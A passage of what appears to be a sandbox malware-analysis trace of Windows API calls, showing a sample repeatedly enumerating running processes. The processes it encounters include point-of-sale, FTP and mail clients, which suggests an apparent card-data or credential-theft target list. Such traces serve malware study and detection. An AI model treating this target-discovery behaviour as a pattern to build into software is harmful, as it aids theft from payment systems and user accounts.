dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0236.600] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1014, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0236.601] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x101c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0236.602] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x102c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0236.604] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0236.605] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0236.607] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1054, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0236.609] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x108c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="discussion.exe")) returned 1 [0236.611] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1094, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="styledesignbusiness.exe")) returned 1 [0236.612] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x109c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="new_door.exe")) returned 1 [0236.613] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bed fight.exe")) returned 1 [0236.615] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="federal hotel.exe")) returned 1 [0236.616] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0236.617] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0236.619] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0236.677] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0236.678] CloseHandle (hObject=0x1b08) returned 1 [0236.678] Sleep (dwMilliseconds=0x64) [0236.827] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1b08 [0236.835] Process32First (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0236.837] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x73, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0236.838] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0236.842] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0236.843] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0236.845] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0236.846] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0236.847] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0236.849] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0236.850] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0236.851] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0236.853] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0236.857] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x45, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0236.858] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0236.860] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0236.861] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0236.862] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0236.863] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0236.865] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0236.866] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0236.867] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0236.869] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0236.938] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0236.939] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2e, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0236.941] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0236.942] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0236.944] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0236.945] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0236.947] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xba8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0236.951] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xad4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0236.952] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x670, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0236.954] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0236.955] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x670, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0236.956] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x428, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="degree_sing_pretty.exe")) returned 1 [0236.957] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="work-heavy.exe")) returned 1 [0236.959] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="member.exe")) returned 1 [0236.960] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="real-new.exe")) returned 1 [0236.961] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="letter.exe")) returned 1 [0236.963] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="lightwhere.exe")) returned 1 [0236.967] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="charge_model_ready.exe")) returned 1 [0236.968] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fearfew.exe")) returned 1 [0236.970] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bag-begin-gas.exe")) returned 1 [0236.971] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="take whether.exe")) returned 1 [0236.972] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="common trade station.exe")) returned 1 [0236.974] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xda8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="small_money.exe")) returned 1 [0236.975] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="magazineofficialteach.exe")) returned 1 [0236.976] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="involve.exe")) returned 1 [0236.978] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="religious_free_generation.exe")) returned 1 [0237.031] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="hair friend will.exe")) returned 1 [0237.032] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whose.exe")) returned 1 [0237.034] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0237.035] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0237.036] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0237.038] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0237.039] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0237.040] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0237.042] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0237.045] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0237.047] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xed4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0237.049] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0237.050] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0237.052] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0237.054] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0237.055] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0237.057] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0237.062] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0237.064] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0237.065] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0237.067] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | 